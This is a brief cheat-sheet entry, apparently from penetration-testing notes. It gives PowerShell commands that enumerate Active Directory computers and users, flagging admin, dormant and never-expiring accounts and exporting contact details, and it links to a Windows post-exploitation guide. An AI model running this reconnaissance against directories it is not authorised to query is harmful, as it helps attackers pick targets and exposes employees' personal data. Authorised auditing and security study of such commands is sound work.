Get-ADComputer -Filter * -Properties * | Select-Object @{Label="Computer Name";Expression={$_.Name}},@{Label="Last Logon Date";Expression={$_.LastLogonDate}}

Get-ADUser -Filter * -Properties * | Select-Object @{Label="Logon Name";Expression={$_.sAMAccountName}},
    @{Label="Last LogOn Date";Expression={$_.LastLogonDate.ToString('yyyy-MM-dd')}},
    @{Label="Created Date";Expression={$_.whenCreated.ToString('yyyy-MM-dd')}},
    @{Label="<n> Month Dormant";Expression={if (($_.LastLogonDate -gt <start date>) -and ($_.LastLogonDate -lt $time)) {'True'} Else {'False'}}},
    @{Label="Password Expire";Expression={if ($_.PasswordNeverExpires -eq 'TRUE') {'Enabled'} Else {'Disabled'}}},
    @{Label="Account Status";Expression={if ($_.Enabled -eq 'TRUE') {'Enabled'} Else {'Disabled'}}},  # the if statement replaces $_.Enabled
    @{Label="Admin User";Expression={if ($_.adminCount -eq '1') {'TRUE'} Else {'FALSE'}}},
    @{Label="Description";Expression={$_.Description}},
    @{Label="Applications";Expression={$_.info}},
    @{Label="First Name";Expression={$_.GivenName}},
    @{Label="Last Name";Expression={$_.Surname}},
    @{Label="Display Name";Expression={$_.DisplayName}},
    @{Label="Job Title";Expression={$_.Title}},
    @{Label="Company";Expression={$_.Company}},
    @{Label="Department";Expression={$_.Department}},
    @{Label="Office";Expression={$_.OfficeName}},
    @{Label="Phone";Expression={$_.telephoneNumber}},
    @{Label="Email";Expression={$_.Mail}}
    Enumerate users and computers using PowerShell (requires the ActiveDirectory module). The dormancy window (<start date> and $time) is not defined in the snippet; set it to the period you want to check.

http://hackingandsecurity.blogspot.com/.../oscp-windows-post-exploitation.html
    Windows guide for post exploitation.